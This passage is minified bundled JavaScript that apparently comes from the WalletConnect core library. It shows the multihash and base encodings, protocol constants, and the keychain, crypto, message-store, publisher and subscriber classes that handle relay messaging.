    return r < $e9e439c110f17033$var$Fs ? 1 : r < $e9e439c110f17033$var$Ms ? 2 : r < $e9e439c110f17033$var$Ks ? 3 : r < $e9e439c110f17033$var$ks ? 4 : r < $e9e439c110f17033$var$Bs ? 5 : r < $e9e439c110f17033$var$js ? 6 : r < $e9e439c110f17033$var$Vs ? 7 : r < $e9e439c110f17033$var$qs ? 8 : r < $e9e439c110f17033$var$Ys ? 9 : 10;
}, $e9e439c110f17033$var$Js = {
    encode: $e9e439c110f17033$var$As,
    decode: $e9e439c110f17033$var$Ls,
    encodingLength: $e9e439c110f17033$var$Gs
}, $e9e439c110f17033$var$Le = $e9e439c110f17033$var$Js;
const $e9e439c110f17033$var$$e = (r, e, t = 0)=>($e9e439c110f17033$var$Le.encode(r, e, t), e), $e9e439c110f17033$var$Fe = (r)=>$e9e439c110f17033$var$Le.encodingLength(r), $e9e439c110f17033$var$oe = (r, e)=>{
    const t = e.byteLength, i = $e9e439c110f17033$var$Fe(r), s = i + $e9e439c110f17033$var$Fe(t), n = new Uint8Array(s + t);
    return $e9e439c110f17033$var$$e(r, n, 0), $e9e439c110f17033$var$$e(t, n, i), n.set(e, s), new $e9e439c110f17033$var$Hs(r, t, e, n);
};
class $e9e439c110f17033$var$Hs {
    constructor(e, t, i, s){
        this.code = e, this.size = t, this.digest = i, this.bytes = s;
    }
}
const $e9e439c110f17033$var$Me = ({ name: r, code: e, encode: t })=>new $e9e439c110f17033$var$Ws(r, e, t);
class $e9e439c110f17033$var$Ws {
    constructor(e, t, i){
        this.name = e, this.code = t, this.encode = i;
    }
    digest(e) {
        if (e instanceof Uint8Array) {
            const t = this.encode(e);
            return t instanceof Uint8Array ? $e9e439c110f17033$var$oe(this.code, t) : t.then((i)=>$e9e439c110f17033$var$oe(this.code, i));
        } else throw Error("Unknown type, must be binary type");
    }
}
const $e9e439c110f17033$var$Ke = (r)=>async (e)=>new Uint8Array(await crypto.subtle.digest(r, e)), $e9e439c110f17033$var$Xs = $e9e439c110f17033$var$Me({
    name: "sha2-256",
    code: 18,
    encode: $e9e439c110f17033$var$Ke("SHA-256")
}), $e9e439c110f17033$var$Zs = $e9e439c110f17033$var$Me({
    name: "sha2-512",
    code: 19,
    encode: $e9e439c110f17033$var$Ke("SHA-512")
});
var $e9e439c110f17033$var$Qs = Object.freeze({
    __proto__: null,
    sha256: $e9e439c110f17033$var$Xs,
    sha512: $e9e439c110f17033$var$Zs
});
const $e9e439c110f17033$var$ke = 0, $e9e439c110f17033$var$er = "identity", $e9e439c110f17033$var$Be = $e9e439c110f17033$var$Oe, $e9e439c110f17033$var$tr = (r)=>$e9e439c110f17033$var$oe($e9e439c110f17033$var$ke, $e9e439c110f17033$var$Be(r)), $e9e439c110f17033$var$ir = {
    code: $e9e439c110f17033$var$ke,
    name: $e9e439c110f17033$var$er,
    encode: $e9e439c110f17033$var$Be,
    digest: $e9e439c110f17033$var$tr
};
var $e9e439c110f17033$var$sr = Object.freeze({
    __proto__: null,
    identity: $e9e439c110f17033$var$ir
});
new TextEncoder, new TextDecoder;
const $e9e439c110f17033$var$je = {
    ...$e9e439c110f17033$var$Hi,
    ...$e9e439c110f17033$var$Xi,
    ...$e9e439c110f17033$var$Qi,
    ...$e9e439c110f17033$var$ts,
    ...$e9e439c110f17033$var$rs,
    ...$e9e439c110f17033$var$ps,
    ...$e9e439c110f17033$var$bs,
    ...$e9e439c110f17033$var$fs,
    ...$e9e439c110f17033$var$_s,
    ...$e9e439c110f17033$var$xs
};
({
    ...$e9e439c110f17033$var$Qs,
    ...$e9e439c110f17033$var$sr
});
function $e9e439c110f17033$var$Ve(r) {
    return globalThis.Buffer != null ? new Uint8Array(r.buffer, r.byteOffset, r.byteLength) : r;
}
function $e9e439c110f17033$var$rr(r = 0) {
    return globalThis.Buffer != null && globalThis.Buffer.allocUnsafe != null ? $e9e439c110f17033$var$Ve(globalThis.Buffer.allocUnsafe(r)) : new Uint8Array(r);
}
function $e9e439c110f17033$var$qe(r, e, t, i) {
    return {
        name: r,
        prefix: e,
        encoder: {
            name: r,
            prefix: e,
            encode: t
        },
        decoder: {
            decode: i
        }
    };
}
const $e9e439c110f17033$var$Ye = $e9e439c110f17033$var$qe("utf8", "u", (r)=>"u" + new TextDecoder("utf8").decode(r), (r)=>new TextEncoder().encode(r.substring(1))), $e9e439c110f17033$var$he = $e9e439c110f17033$var$qe("ascii", "a", (r)=>{
    let e = "a";
    for(let t = 0; t < r.length; t++)e += String.fromCharCode(r[t]);
    return e;
}, (r)=>{
    r = r.substring(1);
    const e = $e9e439c110f17033$var$rr(r.length);
    for(let t = 0; t < r.length; t++)e[t] = r.charCodeAt(t);
    return e;
}), $e9e439c110f17033$var$nr = {
    utf8: $e9e439c110f17033$var$Ye,
    "utf-8": $e9e439c110f17033$var$Ye,
    hex: $e9e439c110f17033$var$je.base16,
    latin1: $e9e439c110f17033$var$he,
    ascii: $e9e439c110f17033$var$he,
    binary: $e9e439c110f17033$var$he,
    ...$e9e439c110f17033$var$je
};
function $e9e439c110f17033$var$ar(r, e = "utf8") {
    const t = $e9e439c110f17033$var$nr[e];
    if (!t) throw new Error(`Unsupported encoding "${e}"`);
    return (e === "utf8" || e === "utf-8") && globalThis.Buffer != null && globalThis.Buffer.from != null ? $e9e439c110f17033$var$Ve(globalThis.Buffer.from(r, "utf-8")) : t.decoder.decode(`${t.prefix}${r}`);
}
const $e9e439c110f17033$export$51b1c900ac262bdf = "wc", $e9e439c110f17033$export$f30bd3c8747cdfbe = 2, $e9e439c110f17033$export$d47601f9de5ee22b = "core", $e9e439c110f17033$export$f258d29ae5e3d545 = `${$e9e439c110f17033$export$51b1c900ac262bdf}@2:${$e9e439c110f17033$export$d47601f9de5ee22b}:`, $e9e439c110f17033$export$db0fdb6d486555c2 = {
    name: $e9e439c110f17033$export$d47601f9de5ee22b,
    logger: "error"
}, $e9e439c110f17033$export$ba920abfe854b85d = {
    database: ":memory:"
}, $e9e439c110f17033$export$92a79f21481c803d = "crypto", $e9e439c110f17033$export$3613aa6e652146e4 = "client_ed25519_seed", $e9e439c110f17033$export$c4bc5e31a4d0ec78 = (0, $aG48A.ONE_DAY), $e9e439c110f17033$export$9d7218f72e8dc49b = "keychain", $e9e439c110f17033$export$34f82f4ba0c3d769 = "0.3", $e9e439c110f17033$export$9662bbc7d10cf481 = "messages", $e9e439c110f17033$export$19dfd1896412c038 = "0.3", $e9e439c110f17033$export$8ddbe6611b67d926 = (0, $aG48A.SIX_HOURS), $e9e439c110f17033$export$9d92662178f2abd1 = "publisher", $e9e439c110f17033$export$822d0bd1635d5360 = "irn", $e9e439c110f17033$export$5176ffa6778d6637 = "error", $e9e439c110f17033$export$a68061e6c48f332a = "wss://relay.walletconnect.com", $e9e439c110f17033$export$27fee22bec112637 = "wss://relay.walletconnect.org", $e9e439c110f17033$export$602d6e27611c3fcb = "relayer", $e9e439c110f17033$export$d56245796e2837d = {
    message: "relayer_message",
    message_ack: "relayer_message_ack",
    connect: "relayer_connect",
    disconnect: "relayer_disconnect",
    error: "relayer_error",
    connection_stalled: "relayer_connection_stalled",
    transport_closed: "relayer_transport_closed",
    publish: "relayer_publish"
}, $e9e439c110f17033$export$119b4645f6b233c8 = "_subscription", $e9e439c110f17033$export$58062acf2f31ddf8 = {
    payload: "payload",
    connect: "connect",
    disconnect: "disconnect",
    error: "error"
}, $e9e439c110f17033$export$11ccd39be2c57d6 = (0, $aG48A.ONE_SECOND) / 2, $e9e439c110f17033$export$44b621f74f0f4c93 = {
    database: ":memory:"
}, $e9e439c110f17033$export$5f30917a6f8c9025 = "2.9.2", $e9e439c110f17033$export$fb3eab7adf12329d = 1e4, $e9e439c110f17033$export$629a342182ba24b = "0.3", $e9e439c110f17033$export$9e4ca561755938da = "WALLETCONNECT_CLIENT_ID", $e9e439c110f17033$export$24ff3e54e94ef413 = {
    created: "subscription_created",
    deleted: "subscription_deleted",
    expired: "subscription_expired",
    disabled: "subscription_disabled",
    sync: "subscription_sync",
    resubscribed: "subscription_resubscribed"
}, $e9e439c110f17033$export$9d35d0a6a3599be = (0, $aG48A.THIRTY_DAYS), $e9e439c110f17033$export$9c3a96bb670cddb8 = "subscription", $e9e439c110f17033$export$fb57e03bef4c4cea = "0.3", $e9e439c110f17033$export$9a2ddbfe54f8af77 = (0, $aG48A.FIVE_SECONDS) * 1e3, $e9e439c110f17033$export$390360ea476c6145 = "pairing", $e9e439c110f17033$export$5593ec74b27d1b18 = "0.3", $e9e439c110f17033$export$ee4b1978d0aedfad = (0, $aG48A.THIRTY_DAYS), $e9e439c110f17033$export$d94d6986a8185883 = {
    wc_pairingDelete: {
        req: {
            ttl: (0, $aG48A.ONE_DAY),
            prompt: !1,
            tag: 1e3
        },
        res: {
            ttl: (0, $aG48A.ONE_DAY),
            prompt: !1,
            tag: 1001
        }
    },
    wc_pairingPing: {
        req: {
            ttl: (0, $aG48A.THIRTY_SECONDS),
            prompt: !1,
            tag: 1002
        },
        res: {
            ttl: (0, $aG48A.THIRTY_SECONDS),
            prompt: !1,
            tag: 1003
        }
    },
    unregistered_method: {
        req: {
            ttl: (0, $aG48A.ONE_DAY),
            prompt: !1,
            tag: 0
        },
        res: {
            ttl: (0, $aG48A.ONE_DAY),
            prompt: !1,
            tag: 0
        }
    }
}, $e9e439c110f17033$export$a682338b5ffca937 = {
    created: "history_created",
    updated: "history_updated",
    deleted: "history_deleted",
    sync: "history_sync"
}, $e9e439c110f17033$export$160142c73cb99dc3 = "history", $e9e439c110f17033$export$8eba9ce85616c607 = "0.3", $e9e439c110f17033$export$4ddf883392bbc828 = "expirer", $e9e439c110f17033$export$9013719d9206b0c1 = {
    created: "expirer_created",
    deleted: "expirer_deleted",
    expired: "expirer_expired",
    sync: "expirer_sync"
}, $e9e439c110f17033$export$717295846191925d = "0.3", $e9e439c110f17033$export$3cfe73d6765db74 = (0, $aG48A.ONE_DAY), $e9e439c110f17033$export$3b58f2450f2297e3 = "verify-api", $e9e439c110f17033$export$7e3b1a28ddecdbaa = "https://verify.walletconnect.com";
class $e9e439c110f17033$export$dd4508d2540f08d3 {
    constructor(e, t){
        this.core = e, this.logger = t, this.keychain = new Map, this.name = $e9e439c110f17033$export$9d7218f72e8dc49b, this.version = $e9e439c110f17033$export$34f82f4ba0c3d769, this.initialized = !1, this.storagePrefix = $e9e439c110f17033$export$f258d29ae5e3d545, this.init = async ()=>{
            if (!this.initialized) {
                const i = await this.getKeyChain();
                typeof i < "u" && (this.keychain = i), this.initialized = !0;
            }
        }, this.has = (i)=>(this.isInitialized(), this.keychain.has(i)), this.set = async (i, s)=>{
            this.isInitialized(), this.keychain.set(i, s), await this.persist();
        }, this.get = (i)=>{
            this.isInitialized();
            const s = this.keychain.get(i);
            if (typeof s > "u") {
                const { message: n } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("NO_MATCHING_KEY", `${this.name}: ${i}`);
                throw new Error(n);
            }
            return s;
        }, this.del = async (i)=>{
            this.isInitialized(), this.keychain.delete(i), await this.persist();
        }, this.core = e, this.logger = (0, $7fc0ce2591a9daef$exports.generateChildLogger)(t, this.name);
    }
    get context() {
        return (0, $7fc0ce2591a9daef$exports.getLoggerContext)(this.logger);
    }
    get storageKey() {
        return this.storagePrefix + this.version + "//" + this.name;
    }
    async setKeyChain(e) {
        await this.core.storage.setItem(this.storageKey, (0, $a5d33cfc7f8e5437$export$c4b8dfeb6e237eb9)(e));
    }
    async getKeyChain() {
        const e = await this.core.storage.getItem(this.storageKey);
        return typeof e < "u" ? (0, $a5d33cfc7f8e5437$export$ac31b37c726bc3ba)(e) : void 0;
    }
    async persist() {
        await this.setKeyChain(this.keychain);
    }
    isInitialized() {
        if (!this.initialized) {
            const { message: e } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("NOT_INITIALIZED", this.name);
            throw new Error(e);
        }
    }
}
class $e9e439c110f17033$export$8ac8b6291b7ccf24 {
    constructor(e, t, i){
        this.core = e, this.logger = t, this.name = $e9e439c110f17033$export$92a79f21481c803d, this.initialized = !1, this.init = async ()=>{
            this.initialized || (await this.keychain.init(), this.initialized = !0);
        }, this.hasKeys = (s)=>(this.isInitialized(), this.keychain.has(s)), this.getClientId = async ()=>{
            this.isInitialized();
            const s = await this.getClientSeed(), n = $2281914794d9e636$export$a949d36eab55b41f(s);
            return $f6e90d472e8dfc29$export$1b29ef9371459e10(n.publicKey);
        }, this.generateKeyPair = ()=>{
            this.isInitialized();
            const s = (0, $a5d33cfc7f8e5437$export$a949d36eab55b41f)();
            return this.setPrivateKey(s.publicKey, s.privateKey);
        }, this.signJWT = async (s)=>{
            this.isInitialized();
            const n = await this.getClientSeed(), a = $2281914794d9e636$export$a949d36eab55b41f(n), o = (0, $a5d33cfc7f8e5437$export$d15a28e4f1821243)(), h = $e9e439c110f17033$export$c4bc5e31a4d0ec78;
            return await $2281914794d9e636$export$a8dda30659d36d45(o, s, h, a);
        }, this.generateSharedKey = (s, n, a)=>{
            this.isInitialized();
            const o = this.getPrivateKey(s), h = (0, $a5d33cfc7f8e5437$export$f8378f68e053f5c6)(o, n);
            return this.setSymKey(h, a);
        }, this.setSymKey = async (s, n)=>{
            this.isInitialized();
            const a = n || (0, $a5d33cfc7f8e5437$export$1e87d19d4aab5805)(s);
            return await this.keychain.set(a, s), a;
        }, this.deleteKeyPair = async (s)=>{
            this.isInitialized(), await this.keychain.del(s);
        }, this.deleteSymKey = async (s)=>{
            this.isInitialized(), await this.keychain.del(s);
        }, this.encode = async (s, n, a)=>{
            this.isInitialized();
            const o = (0, $a5d33cfc7f8e5437$export$7949f60f2444aef2)(a), h = (0, $81c2e06d24b89184$export$abc3f407e87918a4)(n);
            if ((0, $a5d33cfc7f8e5437$export$8c165704db2d5c15)(o)) {
                const y = o.senderPublicKey, k = o.receiverPublicKey;
                s = await this.generateSharedKey(y, k);
            }
            const l = this.getSymKey(s), { type: d, senderPublicKey: b } = o;
            return (0, $a5d33cfc7f8e5437$export$5b0f6292f11d1d18)({
                type: d,
                symKey: l,
                message: h,
                senderPublicKey: b
            });
        }, this.decode = async (s, n, a)=>{
            this.isInitialized();
            const o = (0, $a5d33cfc7f8e5437$export$177f3e316562333d)(n, a);
            if ((0, $a5d33cfc7f8e5437$export$8c165704db2d5c15)(o)) {
                const h = o.receiverPublicKey, l = o.senderPublicKey;
                s = await this.generateSharedKey(h, l);
            }
            try {
                const h = this.getSymKey(s), l = (0, $a5d33cfc7f8e5437$export$e85a0c9a1067c5d3)({
                    symKey: h,
                    encoded: n
                });
                return (0, $81c2e06d24b89184$export$84137bb44359aed5)(l);
            } catch (h) {
                this.logger.error(`Failed to decode message from topic: '${s}', clientId: '${await this.getClientId()}'`), this.logger.error(h);
            }
        }, this.getPayloadType = (s)=>{
            const n = (0, $a5d33cfc7f8e5437$export$efcd34ab6248d3cd)(s);
            return (0, $a5d33cfc7f8e5437$export$7547a514ee29b9d4)(n.type);
        }, this.getPayloadSenderPublicKey = (s)=>{
            const n = (0, $a5d33cfc7f8e5437$export$efcd34ab6248d3cd)(s);
            return n.senderPublicKey ? (0, $74e9859baf4497ef$exports.toString)(n.senderPublicKey, (0, $a5d33cfc7f8e5437$export$49eb910ab2518105)) : void 0;
        }, this.core = e, this.logger = (0, $7fc0ce2591a9daef$exports.generateChildLogger)(t, this.name), this.keychain = i || new $e9e439c110f17033$export$dd4508d2540f08d3(this.core, this.logger);
    }
    get context() {
        return (0, $7fc0ce2591a9daef$exports.getLoggerContext)(this.logger);
    }
    async setPrivateKey(e, t) {
        return await this.keychain.set(e, t), e;
    }
    getPrivateKey(e) {
        return this.keychain.get(e);
    }
    async getClientSeed() {
        let e = "";
        try {
            e = this.keychain.get($e9e439c110f17033$export$3613aa6e652146e4);
        } catch  {
            e = (0, $a5d33cfc7f8e5437$export$d15a28e4f1821243)(), await this.keychain.set($e9e439c110f17033$export$3613aa6e652146e4, e);
        }
        return $e9e439c110f17033$var$ar(e, "base16");
    }
    getSymKey(e) {
        return this.keychain.get(e);
    }
    isInitialized() {
        if (!this.initialized) {
            const { message: e } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("NOT_INITIALIZED", this.name);
            throw new Error(e);
        }
    }
}
class $e9e439c110f17033$export$4a2542d0790ac2fd extends (0, $bace94c1ef08d1bc$export$e67570fe0a885c47) {
    constructor(e, t){
        super(e, t), this.logger = e, this.core = t, this.messages = new Map, this.name = $e9e439c110f17033$export$9662bbc7d10cf481, this.version = $e9e439c110f17033$export$19dfd1896412c038, this.initialized = !1, this.storagePrefix = $e9e439c110f17033$export$f258d29ae5e3d545, this.init = async ()=>{
            if (!this.initialized) {
                this.logger.trace("Initialized");
                try {
                    const i = await this.getRelayerMessages();
                    typeof i < "u" && (this.messages = i), this.logger.debug(`Successfully Restored records for ${this.name}`), this.logger.trace({
                        type: "method",
                        method: "restore",
                        size: this.messages.size
                    });
                } catch (i) {
                    this.logger.debug(`Failed to Restore records for ${this.name}`), this.logger.error(i);
                } finally{
                    this.initialized = !0;
                }
            }
        }, this.set = async (i, s)=>{
            this.isInitialized();
            const n = (0, $a5d33cfc7f8e5437$export$d4c241cec96564c1)(s);
            let a = this.messages.get(i);
            return typeof a > "u" && (a = {}), typeof a[n] < "u" || (a[n] = s, this.messages.set(i, a), await this.persist()), n;
        }, this.get = (i)=>{
            this.isInitialized();
            let s = this.messages.get(i);
            return typeof s > "u" && (s = {}), s;
        }, this.has = (i, s)=>{
            this.isInitialized();
            const n = this.get(i), a = (0, $a5d33cfc7f8e5437$export$d4c241cec96564c1)(s);
            return typeof n[a] < "u";
        }, this.del = async (i)=>{
            this.isInitialized(), this.messages.delete(i), await this.persist();
        }, this.logger = (0, $7fc0ce2591a9daef$exports.generateChildLogger)(e, this.name), this.core = t;
    }
    get context() {
        return (0, $7fc0ce2591a9daef$exports.getLoggerContext)(this.logger);
    }
    get storageKey() {
        return this.storagePrefix + this.version + "//" + this.name;
    }
    async setRelayerMessages(e) {
        await this.core.storage.setItem(this.storageKey, (0, $a5d33cfc7f8e5437$export$c4b8dfeb6e237eb9)(e));
    }
    async getRelayerMessages() {
        const e = await this.core.storage.getItem(this.storageKey);
        return typeof e < "u" ? (0, $a5d33cfc7f8e5437$export$ac31b37c726bc3ba)(e) : void 0;
    }
    async persist() {
        await this.setRelayerMessages(this.messages);
    }
    isInitialized() {
        if (!this.initialized) {
            const { message: e } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("NOT_INITIALIZED", this.name);
            throw new Error(e);
        }
    }
}
class $e9e439c110f17033$var$lr extends (0, $bace94c1ef08d1bc$export$3b0872bbd7e675a2) {
    constructor(e, t){
        super(e, t), this.relayer = e, this.logger = t, this.events = new (0, $7etJZ.EventEmitter), this.name = $e9e439c110f17033$export$9d92662178f2abd1, this.queue = new Map, this.publishTimeout = (0, $aG48A.toMiliseconds)((0, $aG48A.TEN_SECONDS)), this.queueTimeout = (0, $aG48A.toMiliseconds)((0, $aG48A.FIVE_SECONDS)), this.needsTransportRestart = !1, this.publish = async (i, s, n)=>{
            this.logger.debug("Publishing Payload"), this.logger.trace({
                type: "method",
                method: "publish",
                params: {
                    topic: i,
                    message: s,
                    opts: n
                }
            });
            try {
                const a = n?.ttl || $e9e439c110f17033$export$8ddbe6611b67d926, o = (0, $a5d33cfc7f8e5437$export$cf77af25151525db)(n), h = n?.prompt || !1, l = n?.tag || 0, d = n?.id || (0, $3bb3ddc7bbc938cc$export$799a3db5df197877)().toString(), b = {
                    topic: i,
                    message: s,
                    opts: {
                        ttl: a,
                        relay: o,
                        prompt: h,
                        tag: l,
                        id: d
                    }
                }, y = setTimeout(()=>this.queue.set(d, b), this.queueTimeout);
                try {
                    await await (0, $a5d33cfc7f8e5437$export$3da2293b007ed708)(this.rpcPublish(i, s, a, o, h, l, d), this.publishTimeout), clearTimeout(y), this.relayer.events.emit($e9e439c110f17033$export$d56245796e2837d.publish, b);
                } catch  {
                    this.logger.debug("Publishing Payload stalled"), this.needsTransportRestart = !0;
                    return;
                }
                this.logger.debug("Successfully Published Payload"), this.logger.trace({
                    type: "method",
                    method: "publish",
                    params: {
                        topic: i,
                        message: s,
                        opts: n
                    }
                });
            } catch (a) {
                throw this.logger.debug("Failed to Publish Payload"), this.logger.error(a), a;
            }
        }, this.on = (i, s)=>{
            this.events.on(i, s);
        }, this.once = (i, s)=>{
            this.events.once(i, s);
        }, this.off = (i, s)=>{
            this.events.off(i, s);
        }, this.removeListener = (i, s)=>{
            this.events.removeListener(i, s);
        }, this.relayer = e, this.logger = (0, $7fc0ce2591a9daef$exports.generateChildLogger)(t, this.name), this.registerEventListeners();
    }
    get context() {
        return (0, $7fc0ce2591a9daef$exports.getLoggerContext)(this.logger);
    }
    rpcPublish(e, t, i, s, n, a, o) {
        var h, l, d, b;
        const y = {
            method: (0, $a5d33cfc7f8e5437$export$604e3deb95e1b734)(s.protocol).publish,
            params: {
                topic: e,
                message: t,
                ttl: i,
                prompt: n,
                tag: a
            },
            id: o
        };
        return (0, $a5d33cfc7f8e5437$export$fce6876652108ab)((h = y.params) == null ? void 0 : h.prompt) && ((l = y.params) == null || delete l.prompt), (0, $a5d33cfc7f8e5437$export$fce6876652108ab)((d = y.params) == null ? void 0 : d.tag) && ((b = y.params) == null || delete b.tag), this.logger.debug("Outgoing Relay Payload"), this.logger.trace({
            type: "message",
            direction: "outgoing",
            request: y
        }), this.relayer.request(y);
    }
    onPublish(e) {
        this.queue.delete(e);
    }
    checkQueue() {
        this.queue.forEach(async (e)=>{
            const { topic: t, message: i, opts: s } = e;
            await this.publish(t, i, s);
        });
    }
    registerEventListeners() {
        this.relayer.core.heartbeat.on((0, $212993b948b3fe4b$exports.HEARTBEAT_EVENTS).pulse, ()=>{
            if (this.needsTransportRestart) {
                this.needsTransportRestart = !1, this.relayer.events.emit($e9e439c110f17033$export$d56245796e2837d.connection_stalled);
                return;
            }
            this.checkQueue();
        }), this.relayer.on($e9e439c110f17033$export$d56245796e2837d.message_ack, (e)=>{
            this.onPublish(e.id.toString());
        });
    }
}
class $e9e439c110f17033$var$dr {
    constructor(){
        this.map = new Map, this.set = (e, t)=>{
            const i = this.get(e);
            this.exists(e, t) || this.map.set(e, [
                ...i,
                t
            ]);
        }, this.get = (e)=>this.map.get(e) || [], this.exists = (e, t)=>this.get(e).includes(t), this.delete = (e, t)=>{
            if (typeof t > "u") {
                this.map.delete(e);
                return;
            }
            if (!this.map.has(e)) return;
            const i = this.get(e);
            if (!this.exists(e, t)) return;
            const s = i.filter((n)=>n !== t);
            if (!s.length) {
                this.map.delete(e);
                return;
            }
            this.map.set(e, s);
        }, this.clear = ()=>{
            this.map.clear();
        };
    }
    get topics() {
        return Array.from(this.map.keys());
    }
}
var $e9e439c110f17033$var$gr = Object.defineProperty, $e9e439c110f17033$var$pr = Object.defineProperties, $e9e439c110f17033$var$Dr = Object.getOwnPropertyDescriptors, $e9e439c110f17033$var$_t = Object.getOwnPropertySymbols, $e9e439c110f17033$var$yr = Object.prototype.hasOwnProperty, $e9e439c110f17033$var$br = Object.prototype.propertyIsEnumerable, $e9e439c110f17033$var$Rt = (r, e, t)=>e in r ? $e9e439c110f17033$var$gr(r, e, {
        enumerable: !0,
        configurable: !0,
        writable: !0,
        value: t
    }) : r[e] = t, $e9e439c110f17033$var$K = (r, e)=>{
    for(var t in e || (e = {}))$e9e439c110f17033$var$yr.call(e, t) && $e9e439c110f17033$var$Rt(r, t, e[t]);
    if ($e9e439c110f17033$var$_t) for (var t of $e9e439c110f17033$var$_t(e))$e9e439c110f17033$var$br.call(e, t) && $e9e439c110f17033$var$Rt(r, t, e[t]);
    return r;
}, $e9e439c110f17033$var$pe = (r, e)=>$e9e439c110f17033$var$pr(r, $e9e439c110f17033$var$Dr(e));
class $e9e439c110f17033$export$60959659b2c22881 extends (0, $bace94c1ef08d1bc$export$300eed987e764b57) {
    constructor(e, t){
        super(e, t), this.relayer = e, this.logger = t, this.subscriptions = new Map, this.topicMap = new $e9e439c110f17033$var$dr, this.events = new (0, $7etJZ.EventEmitter), this.name = $e9e439c110f17033$export$9c3a96bb670cddb8, this.version = $e9e439c110f17033$export$fb57e03bef4c4cea, this.pending = new Map, this.cached = [], this.initialized = !1, this.pendingSubscriptionWatchLabel = "pending_sub_watch_label", this.pollingInterval = 20, this.storagePrefix = $e9e439c110f17033$export$f258d29ae5e3d545, this.subscribeTimeout = 1e4, this.restartInProgress = !1, this.batchSubscribeTopicsLimit = 500, this.init = async ()=>{
            this.initialized || (this.logger.trace("Initialized"), await this.restart(), this.registerEventListeners(), this.onEnable(), this.clientId = await this.relayer.core.crypto.getClientId());
        }, this.subscribe = async (i, s)=>{
            await this.restartToComplete(), this.isInitialized(), this.logger.debug("Subscribing Topic"), this.logger.trace({
                type: "method",
                method: "subscribe",
                params: {
                    topic: i,
                    opts: s
                }
            });
            try {
                const n = (0, $a5d33cfc7f8e5437$export$cf77af25151525db)(s), a = {
                    topic: i,
                    relay: n
                };
                this.pending.set(i, a);
                const o = await this.rpcSubscribe(i, n);
                return this.onSubscribe(o, a), this.logger.debug("Successfully Subscribed Topic"), this.logger.trace({
                    type: "method",
                    method: "subscribe",
                    params: {
                        topic: i,
                        opts: s
                    }
                }), o;
            } catch (n) {
                throw this.logger.debug("Failed to Subscribe Topic"), this.logger.error(n), n;
            }
        }, this.unsubscribe = async (i, s)=>{
            await this.restartToComplete(), this.isInitialized(), typeof s?.id < "u" ? await this.unsubscribeById(i, s.id, s) : await this.unsubscribeByTopic(i, s);
        }, this.isSubscribed = async (i)=>this.topics.includes(i) ? !0 : await new Promise((s, n)=>{
                const a = new (0, $aG48A.Watch);
                a.start(this.pendingSubscriptionWatchLabel);
                const o = setInterval(()=>{
                    !this.pending.has(i) && this.topics.includes(i) && (clearInterval(o), a.stop(this.pendingSubscriptionWatchLabel), s(!0)), a.elapsed(this.pendingSubscriptionWatchLabel) >= $e9e439c110f17033$export$9a2ddbfe54f8af77 && (clearInterval(o), a.stop(this.pendingSubscriptionWatchLabel), n(new Error("Subscription resolution timeout")));
                }, this.pollingInterval);
            }).catch(()=>!1), this.on = (i, s)=>{
            this.events.on(i, s);
        }, this.once = (i, s)=>{
            this.events.once(i, s);
        }, this.off = (i, s)=>{
            this.events.off(i, s);
        }, this.removeListener = (i, s)=>{
            this.events.removeListener(i, s);
        }, this.restart = async ()=>{
            this.restartInProgress = !0, await this.restore(), await this.reset(), this.restartInProgress = !1;
        }, this.relayer = e, this.logger = (0, $7fc0ce2591a9daef$exports.generateChildLogger)(t, this.name), this.clientId = "";
    }
    get context() {
        return (0, $7fc0ce2591a9daef$exports.getLoggerContext)(this.logger);
    }
    get storageKey() {
        return this.storagePrefix + this.version + "//" + this.name;
    }
    get length() {
        return this.subscriptions.size;
    }
    get ids() {
        return Array.from(this.subscriptions.keys());
    }
    get values() {
        return Array.from(this.subscriptions.values());
    }
    get topics() {
        return this.topicMap.topics;
    }
    hasSubscription(e, t) {
        let i = !1;
        try {
            i = this.getSubscription(e).topic === t;
        } catch  {}
        return i;
    }
    onEnable() {
        this.cached = [], this.initialized = !0;
    }
    onDisable() {
        this.cached = this.values, this.subscriptions.clear(), this.topicMap.clear();
    }
    async unsubscribeByTopic(e, t) {
        const i = this.topicMap.get(e);
        await Promise.all(i.map(async (s)=>await this.unsubscribeById(e, s, t)));
    }
    async unsubscribeById(e, t, i) {
        this.logger.debug("Unsubscribing Topic"), this.logger.trace({
            type: "method",
            method: "unsubscribe",
            params: {
                topic: e,
                id: t,
                opts: i
            }
        });
        try {
            const s = (0, $a5d33cfc7f8e5437$export$cf77af25151525db)(i);
            await this.rpcUnsubscribe(e, t, s);
            const n = (0, $a5d33cfc7f8e5437$export$8203ef1531c8b5b5)("USER_DISCONNECTED", `${this.name}, ${e}`);
            await this.onUnsubscribe(e, t, n), this.logger.debug("Successfully Unsubscribed Topic"), this.logger.trace({
                type: "method",
                method: "unsubscribe",
                params: {
                    topic: e,
                    id: t,
                    opts: i
                }
            });
        } catch (s) {
            throw this.logger.debug("Failed to Unsubscribe Topic"), this.logger.error(s), s;
        }
    }
    async rpcSubscribe(e, t) {
        const i = {
            method: (0, $a5d33cfc7f8e5437$export$604e3deb95e1b734)(t.protocol).subscribe,
            params: {
                topic: e
            }
        };
        this.logger.debug("Outgoing Relay Payload"), this.logger.trace({
            type: "payload",
            direction: "outgoing",
            request: i
        });
        try {
            await await (0, $a5d33cfc7f8e5437$export$3da2293b007ed708)(this.relayer.request(i), this.subscribeTimeout);
        } catch  {
            this.logger.debug("Outgoing Relay Subscribe Payload stalled"), this.relayer.events.emit($e9e439c110f17033$export$d56245796e2837d.connection_stalled);
        }
        return (0, $a5d33cfc7f8e5437$export$d4c241cec96564c1)(e + this.clientId);
    }
    async rpcBatchSubscribe(e) {
        if (!e.length) return;
        const t = e[0].relay, i = {
            method: (0, $a5d33cfc7f8e5437$export$604e3deb95e1b734)(t.protocol).batchSubscribe,
            params: {
                topics: e.map((s)=>s.topic)
            }
        };
        this.logger.debug("Outgoing Relay Payload"), this.logger.trace({
            type: "payload",
            direction: "outgoing",
            request: i
        });
        try {
            return await await (0, $a5d33cfc7f8e5437$export$3da2293b007ed708)(this.relayer.request(i), this.subscribeTimeout);
        } catch  {
            this.logger.debug("Outgoing Relay Payload stalled"), this.relayer.events.emit($e9e439c110f17033$export$d56245796e2837d.connection_stalled);
        }
    }
    rpcUnsubscribe(e, t, i) {
        const s = {
            method: (0, $a5d33cfc7f8e5437$export$604e3deb95e1b734)(i.protocol).unsubscribe,
            params: {
                topic: e,
                id: t
            }
        };
        return this.logger.debug("Outgoing Relay Payload"), this.logger.trace({
            type: "payload",
